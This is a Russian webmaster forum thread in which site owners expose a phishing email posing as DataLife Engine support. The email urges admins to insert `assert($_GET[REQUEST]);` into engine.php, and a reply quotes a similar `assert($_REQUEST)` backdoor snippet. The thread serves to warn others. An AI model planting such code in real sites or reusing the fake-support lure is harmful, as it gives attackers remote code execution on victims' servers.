Привет, форумчане. Давно я сюда не писал, но этот случай показался мне крайне забавным.
В общем встаю я с утра, вижу письмо отправленное через обратную связь на сайте. Типа от официальной службы поддержки DLE(!).
Вот само письмо:
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте shlyahten.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: shlyahten.ru/engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_GET[REQUEST]);
С уважением,
Служба поддержки «DataLife Engine»
IP адрес отправителя: 199.27.128.202
Сначала я почти поверил. Да и думаю многие, кто не знает PHP поверят в это. Но потом, когда я уже начал просыпаться, я заметил что-то не ладное.
В тексте говорится о фильтрации. Но даже я понимаю, что данный код никакой фильтрации не производит. Так что считаю это бэкдором.
Ваши идеи?
19.10.2014 12:23- 0
- 19.10.2014 12:47Опытный
- Регистрация: 08.06.2011
- Сообщений: 342
- Репутация: 64
Банальный развод, подобные письма давно уже ходят.Aassert такой себе аналог exec, только не такой явный
- 0
- 19.10.2014 13:09
вы не один такой http://searchengines.guru/showthread.php?t=869369
- 0
- 19.10.2014 15:12Студент
- Регистрация: 10.10.2014
- Сообщений: 86
- Репутация: 5
Тоже такое пришло, причем на сайты с версиями ДЛЕ от 6 до 10. Выбирают автоматом сайты на этой ЦМС, и через стандартную форму, которая у всех на одном урле делают рассылку. Расчет на нубов.
- 0
- 19.10.2014 20:14
Lacoste, кто-нибудь может объяснить, что делает код? Он же вроде безобидный. Странный в общем.
- 0
- 19.10.2014 20:34
Код, который мы будем внедрять в tmp-файл:
<?php
assert(stripslashes($_REQUEST["e"]));
?>
С помощью PHP-сценария формируем POST-пакет для отправки файла с PHP-кодом:
Дальше не стоит думаю объяснять) Да, детская попытка взлома.- 0
- 20.10.2014 00:45
Rubilnik, на сколько я знаю, если Админы движка видят какие-либо уязвимости или недоработки, в той или иной версии - они оповещают об этом ВМ на оф сайте в определенной теме (в зависимости от версии движка) и пишут инструкции, как исправить эти ошибки... Если к вам приходят такие письма - лучше сразу на оф сайт. Если там нет подобного - лучше проигнорировать письмо.
- 0
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Уведомление о неудачных попытках входа[Попытка взлома?] | Обсуждение форума и ваши предложения | 53 | 06.04.2012 02:17 |
Попытка черного пиара!? | Оффтоп и свободные темы | 16 | 15.01.2012 15:51 |
Попытка взлома аккаунта на webmasters.ru | Оффтоп и свободные темы | 3 | 20.12.2011 13:15 |
Попытка развода или случайность? | Оффтоп и свободные темы | 31 | 30.09.2011 18:53 |
adsense cpa parser proxy wordpress yandex youtube zennoposter аккаунт база банка быть версия вечный вконтакт гугл делиться день есть запрос изменение импорт использовать качественный кейс ключ комплексный контакт купить место можно новый нч-сч партнерский партнёрка партнёрская программа платформа поддержка поинт поинтовый прогон программа продвижение продвинуть работа сайт скрипт спам ссылка стать стоимость страна страница тариф тиц-пр трастовый трафик учет форум шаблон
Тем:
77,476Сообщений:
761,508Пользователей:
30,076Сейчас на сайте:
0 пользователей и 255 гостей
